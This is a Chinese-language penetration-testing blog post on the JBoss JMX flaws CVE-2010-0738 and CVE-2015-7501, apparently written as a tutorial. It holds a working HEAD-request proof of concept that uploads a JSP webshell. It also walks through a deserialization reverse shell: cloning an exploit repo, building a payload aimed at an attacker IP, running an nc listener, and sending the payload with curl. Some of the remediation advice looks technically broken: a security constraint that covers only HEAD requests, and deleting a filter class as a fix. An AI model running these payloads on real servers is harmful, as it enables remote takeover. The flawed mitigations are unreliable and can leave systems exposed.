从CVE-2010-0738到CVE-2015-7501：剖析JBoss JMX组件的安全演进与实战攻防

1. JBoss JMX组件安全漏洞演进史

第一次接触JBoss漏洞是在2010年，当时CVE-2010-0738这个漏洞让我印象深刻。记得那会儿很多企业还在用JBoss 4.x版本，这个漏洞简直就像给黑客开了后门。后来到了2015年，又出现了CVE-2015-7501，这两个漏洞虽然相隔五年，但都跟JMX组件有关，今天我们就来好好聊聊这段"黑历史"。

JMX（Java Management Extensions）是Java平台的管理和监控接口，在JBoss中主要通过JMX Console和JMXInvokerServlet两个组件实现。这两个组件本意是方便管理员管理服务器，但设计上的疏忽却成了黑客的最爱。从早期的HTTP方法绕过到后来的反序列化攻击，攻击手法越来越高级，这也反映了Java安全防护的演进过程。

2. CVE-2010-0738：HTTP方法绕过漏洞详解

2.1 漏洞原理与影响范围

这个漏洞的精妙之处在于它利用了HTTP协议的特性。正常情况下，JMX Console会对GET和POST请求做安全检查，但HEAD请求却被忽略了。攻击者可以通过构造特殊的HEAD请求，绕过身份验证直接执行MBean操作。

我实测过这个漏洞，受影响的主要是JBoss 4.2.0到4.3.0版本。当时很多企业没意识到这个问题，因为JMX Console默认就是开启的，而且很多管理员为了方便，连默认密码都没改。

2.2 漏洞复现实战

搭建环境我推荐用Docker，简单几行命令就能搞定：

docker pull jboss4.2.0 docker run -p 8080:8080 -d jboss4.2.0

漏洞利用的POC是这样的：

HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.admin:service=DeploymentFileRepository&methodIndex=6&arg0=../jmx-console.war/&arg1=hax0rwin&arg2=.jsp&arg3=<%Runtime.getRuntime().exec(request.getParameter("i"));%>&arg4=True

这个POC会往服务器上传一个WebShell，参数解释：

• methodIndex=6 对应的是store()方法
• arg0指定了文件路径
• arg1和arg2组成文件名
• arg3是文件内容（JSP木马）
• arg4=True表示覆盖已存在文件

3. CVE-2015-7501：反序列化漏洞深度解析

3.1 漏洞背景与技术原理

五年后的这个漏洞就更厉害了，它利用了Java反序列化的特性。JBoss的JMXInvokerServlet组件在处理请求时，会直接反序列化客户端传来的数据，而Apache Commons Collections库中的某些类可以被恶意利用。

我分析过漏洞代码，问题出在ReadOnlyAccessFilter这个过滤器上。它本应该检查反序列化的数据，但实际上什么都没做。攻击者可以构造特殊的序列化对象，在服务器端执行任意代码。

3.2 环境搭建与漏洞验证

用Docker搭建测试环境：

docker pull testjboss/jboss docker run -p 8085:8080 -d testjboss/jboss

验证漏洞是否存在很简单，直接访问：

http://靶机IP:8085/invoker/JMXInvokerServlet

如果返回200状态码和序列化数据，说明存在漏洞。

3.3 漏洞利用实战

完整的攻击流程分几步：

1. 准备攻击机（Kali Linux）
2. 下载利用工具：

git clone https://github.com/ianxtianxt/CVE-2015-7501 cd CVE-2015-7501

3. 编译利用代码：

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

4. 生成恶意序列化文件：

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:监听端口

5. 开启监听：

nc -lvnp 监听端口

6. 发送Payload：

curl http://靶机IP:8085/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

4. 安全防护与修复方案

4.1 针对CVE-2010-0738的防护

最直接的修复方法是升级JBoss版本。如果暂时不能升级，可以：

1. 关闭JMX Console
2. 配置jboss-web.xml限制访问
3. 修改web.xml添加安全约束

我建议的配置示例：

<security-constraint> <web-resource-collection> <web-resource-name>JMX Console</web-resource-name> <url-pattern>/jmx-console/*</url-pattern> <http-method>HEAD</http-method> </web-resource-collection> <auth-constraint> <role-name>Admin</role-name> </auth-constraint> </security-constraint>

4.2 针对CVE-2015-7501的防护

这个漏洞的修复比较复杂，因为涉及到底层的反序列化机制：

1. 升级到JBoss EAP 6.4.0或更高版本
2. 删除invoker/JMXInvokerServlet
3. 使用Java反序列化过滤器

我常用的临时解决方案是：

rm -f $JBOSS_HOME/server/default/deploy/http-invoker.sar/invoker.war/WEB-INF/classes/org/jboss/invocation/http/servlet/MethodSerializationFilter.class

5. 从漏洞演进看Java安全发展

这两个漏洞虽然都是JMX组件的问题，但攻击方式完全不同。2010年的漏洞还停留在应用层，2015年的就已经深入到Java运行时了。这五年间，黑客技术也在不断进化。

我在实际渗透测试中发现，很多企业服务器同时存在这两个漏洞。攻击者通常会先用CVE-2010-0738尝试，失败后再用CVE-2015-7501。这种"组合拳"攻击成功率很高。

对于开发者来说，理解这些漏洞的演进历史很重要。它不仅帮助我们更好地防护现有系统，也能预见未来可能出现的安全问题。比如现在的云原生环境，虽然解决了部分传统漏洞，但又带来了新的攻击面。